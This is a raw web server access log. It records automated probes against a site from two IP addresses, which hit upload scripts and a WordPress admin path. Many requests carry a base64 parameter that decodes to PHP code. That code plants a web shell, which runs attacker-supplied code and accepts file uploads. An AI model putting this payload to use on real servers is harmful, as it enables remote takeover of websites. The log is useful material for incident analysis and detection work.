194.68.32.71 - - [07/Nov/2025:22:44:27 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (X11; Linux i686; rv:46.0) Gecko/20100101 Firefox/46.0"
194.68.32.71 - - [07/Nov/2025:22:44:28 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Linux i686; rv:46.0) Gecko/20100101 Firefox/46.0"
194.68.32.71 - - [07/Nov/2025:22:44:24 +0000] "GET / HTTP/1.1" 200 1662 "-" "Mozilla/5.0 (X11; Linux i686; rv:46.0) Gecko/20100101 Firefox/46.0"
194.68.32.71 - - [07/Nov/2025:22:44:24 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (X11; Linux i686; rv:46.0) Gecko/20100101 Firefox/46.0"
194.68.32.71 - - [07/Nov/2025:22:44:26 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (X11; Linux i686; rv:46.0) Gecko/20100101 Firefox/46.0"
194.68.32.71 - - [07/Nov/2025:22:44:27 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (X11; Linux i686; rv:46.0) Gecko/20100101 Firefox/46.0"
89.208.107.124 - - [07/Nov/2025:22:59:03 +0000] "GET / HTTP/1.1" 200 1662 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0"
89.208.107.124 - - [07/Nov/2025:22:59:04 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0"
89.208.107.124 - - [07/Nov/2025:22:59:20 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0"
89.208.107.124 - - [07/Nov/2025:22:59:22 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0"
45.227.253.15 - - [07/Nov/2025:23:08:54 +0000] "GET /f3dc2/admin.php?ARRAY=7o2230223n313736323536303738392p2231223n22687474703n5p2s5p2s7n7336363876313361732r6s65636s726573732r6p6s6p5p2s3s6p633q78696164616r5s72616r645s7061746826743q313736323535373138392q3362363061613232643430613761633732663638653563356634373462333438222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:103.0) Gecko/20100101 Firefox/103.0"
15.235.96.34 - - [07/Nov/2025:23:00:04 +0000] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.39.136.255 - - [07/Nov/2025:23:04:38 +0000] "GET /_autoindex/assets/css/autoindex.css HTTP/1.1" 200 1170 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
15.235.27.137 - - [07/Nov/2025:23:04:39 +0000] "GET /_autoindex/assets/js/tablesort.number.js HTTP/1.1" 200 322 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.39.203.78 - - [07/Nov/2025:23:04:40 +0000] "GET /_autoindex/assets/icons/file.svg HTTP/1.1" 200 354 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
89.208.107.124 - - [07/Nov/2025:22:59:09 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0"
89.208.107.124 - - [07/Nov/2025:22:59:09 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0"
142.44.225.230 - - [07/Nov/2025:23:00:12 +0000] "GET / HTTP/1.1" 200 1424 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.39.89.41 - - [07/Nov/2025:23:04:40 +0000] "GET /_autoindex/assets/js/tablesort.js HTTP/1.1" 200 2137 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
194.68.32.71 - - [07/Nov/2025:23:15:19 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2872.60 Safari/537.36"
194.68.32.71 - - [07/Nov/2025:23:15:01 +0000] "GET / HTTP/1.1" 200 1662 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2872.60 Safari/537.36"
194.68.32.71 - - [07/Nov/2025:23:15:09 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2872.60 Safari/537.36"
194.68.32.71 - - [07/Nov/2025:23:15:18 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2872.60 Safari/537.36"
194.68.32.71 - - [07/Nov/2025:23:15:18 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2872.60 Safari/537.36"
194.68.32.71 - - [07/Nov/2025:23:15:34 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2872.60 Safari/537.36"
89.208.107.124 - - [07/Nov/2025:23:32:04 +0000] "GET / HTTP/1.1" 200 1662 "-" "Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2755.37 Safari/537.36"
89.208.107.124 - - [07/Nov/2025:23:32:04 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2755.37 Safari/537.36"
89.208.107.124 - - [07/Nov/2025:23:32:04 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2755.37 Safari/537.36"
89.208.107.124 - - [07/Nov/2025:23:32:23 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2755.37 Safari/537.36"
89.208.107.124 - - [07/Nov/2025:23:32:24 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2755.37 Safari/537.36"
89.208.107.124 - - [07/Nov/2025:23:32:24 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2755.37 Safari/537.36"
89.208.107.124 - - [08/Nov/2025:00:00:37 +0000] "GET / HTTP/1.1" 200 1664 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0"
89.208.107.124 - - [08/Nov/2025:00:00:37 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0"
89.208.107.124 - - [08/Nov/2025:00:00:38 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0"
89.208.107.124 - - [08/Nov/2025:00:00:38 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0"
194.68.32.71 - - [07/Nov/2025:23:46:01 +0000] "GET / HTTP/1.1" 200 1662 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2920.1 Safari/537.36"
194.68.32.71 - - [07/Nov/2025:23:46:03 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2920.1 Safari/537.36"
194.68.32.71 - - [07/Nov/2025:23:46:09 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2920.1 Safari/537.36"
194.68.32.71 - - [07/Nov/2025:23:46:04 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2920.1 Safari/537.36"
194.68.32.71 - - [07/Nov/2025:23:46:09 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2920.1 Safari/537.36"
194.68.32.71 - - [07/Nov/2025:23:46:10 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2920.1 Safari/537.36"
89.208.107.124 - - [08/Nov/2025:00:00:47 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0"
89.208.107.124 - - [08/Nov/2025:00:00:48 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0"
89.208.107.124 - - [08/Nov/2025:00:16:21 +0000] "GET / HTTP/1.1" 200 1676 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:49.0) Gecko/20100101 Firefox/49.0"
89.208.107.124 - - [08/Nov/2025:00:16:22 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:49.0) Gecko/20100101 Firefox/49.0"
89.208.107.124 - - [08/Nov/2025:00:16:38 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:49.0) Gecko/20100101 Firefox/49.0"
89.208.107.124 - - [08/Nov/2025:00:16:38 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:49.0) Gecko/20100101 Firefox/49.0"
89.208.107.124 - - [08/Nov/2025:00:16:22 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:49.0) Gecko/20100101 Firefox/49.0"
89.208.107.124 - - [08/Nov/2025:00:16:22 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:49.0) Gecko/20100101 Firefox/49.0"
